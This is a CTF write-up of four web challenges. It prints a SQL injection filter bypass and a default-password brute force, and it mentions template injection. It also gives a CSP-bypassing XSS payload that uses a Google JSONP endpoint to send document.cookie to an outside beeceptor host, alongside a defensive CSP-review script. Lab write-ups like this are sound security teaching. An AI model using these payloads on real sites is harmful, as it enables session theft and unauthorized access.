CAT CTF.ae-Write-up
Hi, my name is Ahmed Magdy :)
I would like to thank all the organizers for this CTF
and my new team
Let's get to solving the web challenges…
1 - Challenge Name : Admin Panel
When I checked the source code, I found the username and password (Guest_101) in an HTML comment.
After spending a long time on the cookie, I couldn't find anything :(
I will try SQL injection to see if anything happens.
When I tried SQL injection, it alerted (Forbidden).
It filters any payload that includes (or).
I tried some payloads and this one worked >> Guest_101'/*//*/'1'='
user and password >> Guest_101'/*//*/'1'='
Flag : CTFAE{SQLi_1s_C00l_Vulnerability_Th0ugh_Sp3cially_1n_CTFAE}
2 - Challenge Name : Greeting Generator
I found three input fields and tried command injection, but the command was just printed. Let's try Server Side Template Injection.
The template engine is probably Jinja2, but you have to deal with some restrictions.
When I figured out what was happening, I remembered the write-up by Abdalla Tarek,
but with a different flag.
Flag : CTFAE{HelloThereGeneralKenobi}
3 - Challenge Name : Sorry Wilson
I will try the username and password = admin, or anything else I find.
When I checked the source code, I found this HTML comment.
After running dirb, I found generated_users.txt, .DS_Store and README.md.
Opening generated_users.txt, I found all the users for team forest, and I tried brute-forcing the username; the default password was P@ssw0rd!
I checked in case I could find the cookies.
I found these cookies.
Once logged in, brute force the uid cookie using the same file.
Flag : CTFAE{D0_nOt_Cr347E_CLE4r_M3sSag3}
4 - Challenge Name : Support Ticket 2.0
I will try an XSS payload.
CSP (Content Security Policy) is an HTTP header that a web application sends to tell the browser which sources it trusts to load and execute JavaScript from. Let's examine the CSP policy sent by the server.
We can use an online tool by Google called CSP Evaluator and paste the CSP policy into it to check for any weaknesses.
For more on bypassing CSP using Angular, read this blog here.
From the trusted sources allowed to load and execute JavaScript, I used >>
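To make the CSP point concrete, here is an added example of my own (not code from the challenge or from the CSP Evaluator project) that reviews a policy's script-src the way the tool does: the two policies it checks are constructed for illustration, since the challenge's real header is not reproduced in this write-up, and KNOWN_JSONP_HOSTS is a short illustrative list, not the evaluator's full one.

```python
"""Review a CSP's script-src the way Google's CSP Evaluator does (simplified)."""
from __future__ import annotations

# Hosts that expose JSONP-style endpoints: allowing them in script-src lets an injected
# <script src=...> run attacker-chosen code under the policy (accounts.google.com is the
# one used above). Illustrative subset, not the evaluator's full list.
KNOWN_JSONP_HOSTS = {"accounts.google.com", "www.google.com", "ajax.googleapis.com"}


def parse_csp(header: str) -> dict[str, list[str]]:
    """Split a CSP header into {directive: [source, ...]}."""
    policy: dict[str, list[str]] = {}
    for directive in header.split(";"):
        parts = directive.strip().split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy


def review_script_src(header: str) -> list[str]:
    """Return findings for the effective script-src (falls back to default-src)."""
    policy = parse_csp(header)
    sources = policy.get("script-src", policy.get("default-src"))
    if sources is None:
        return ["no script-src or default-src: scripts may load from anywhere"]
    lowered = [s.lower() for s in sources]
    has_nonce_or_hash = any(s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in lowered)
    strict_dynamic = "'strict-dynamic'" in lowered  # browsers then ignore host allowlists
    findings: list[str] = []
    for src, s in zip(sources, lowered):
        if s == "'unsafe-inline'" and not has_nonce_or_hash:  # a nonce/hash disables it
            findings.append("'unsafe-inline' allows injected inline scripts")
        elif s == "'unsafe-eval'":
            findings.append("'unsafe-eval' allows eval()/Function() on injected strings")
        elif s.startswith("'") or strict_dynamic:
            continue  # keyword, nonce or hash source, or host list ignored by 'strict-dynamic'
        elif s in ("*", "https:", "http:"):
            findings.append(f"{src} allows scripts from any origin")
        else:
            host = s.removeprefix("https://").removeprefix("http://").split("/")[0]
            if host in KNOWN_JSONP_HOSTS:
                findings.append(f"{src} serves JSONP endpoints (known CSP bypass)")
    return findings


# Constructed policies for illustration; the challenge's real header is not reproduced here.
WEAK_CSP = "default-src 'self'; script-src 'self' https://accounts.google.com 'unsafe-eval'"
HARDENED_CSP = ("default-src 'self'; script-src 'nonce-r4nd0mB4se64' 'strict-dynamic'; "
                "object-src 'none'; base-uri 'none'")
```

The hardened policy works because a per-response nonce plus 'strict-dynamic' makes the browser ignore host allowlists entirely, so a JSONP host can no longer be used as a script source.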
"><script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(document.cookie)"></script>
It works! So now let's craft a payload to exfiltrate the cookie and see if there's anything interesting. I will be using a payload that sends the cookie in an HTTP request to a URL: https://Ahmed.free.beeceptor.com
<script src="//accounts.google.com/o/oauth2/revoke?callback=eval(document.location='https://Ahmed.free.beeceptor.com'.concat(document.cookie))"></script>
cookie=session=s%3A6PZYod9n7ENwZ7iDudPtgBkEd6MJstV8.WyFSMUj13Kf6j3Fnk8mIk1MN%2FLhaElmE%2FN16Q%2FPJhH4
The cookie changed with every request,
and its referer >> http://web.ctf.ae:8812/support_ticket/f1400c65-ea9f-48db-9394-0fda02b690db?displayFlag=false
When I used the referer :(
So I used the admin's referer and cookies and changed the parameter displayFlag=false to displayFlag=true.
Flag : CTFAE{JSONAreTheBestTypeOfBees}
End of the web challenges…… I solved them :)
I would like to thank my new team for helping me solve the challenges.
Thank you for your time :)
I would like to thank all the organizers for this CTF again :)
And finally, thank you for reading this write-up :)
Contact me if you want: Ahmed Magdy :)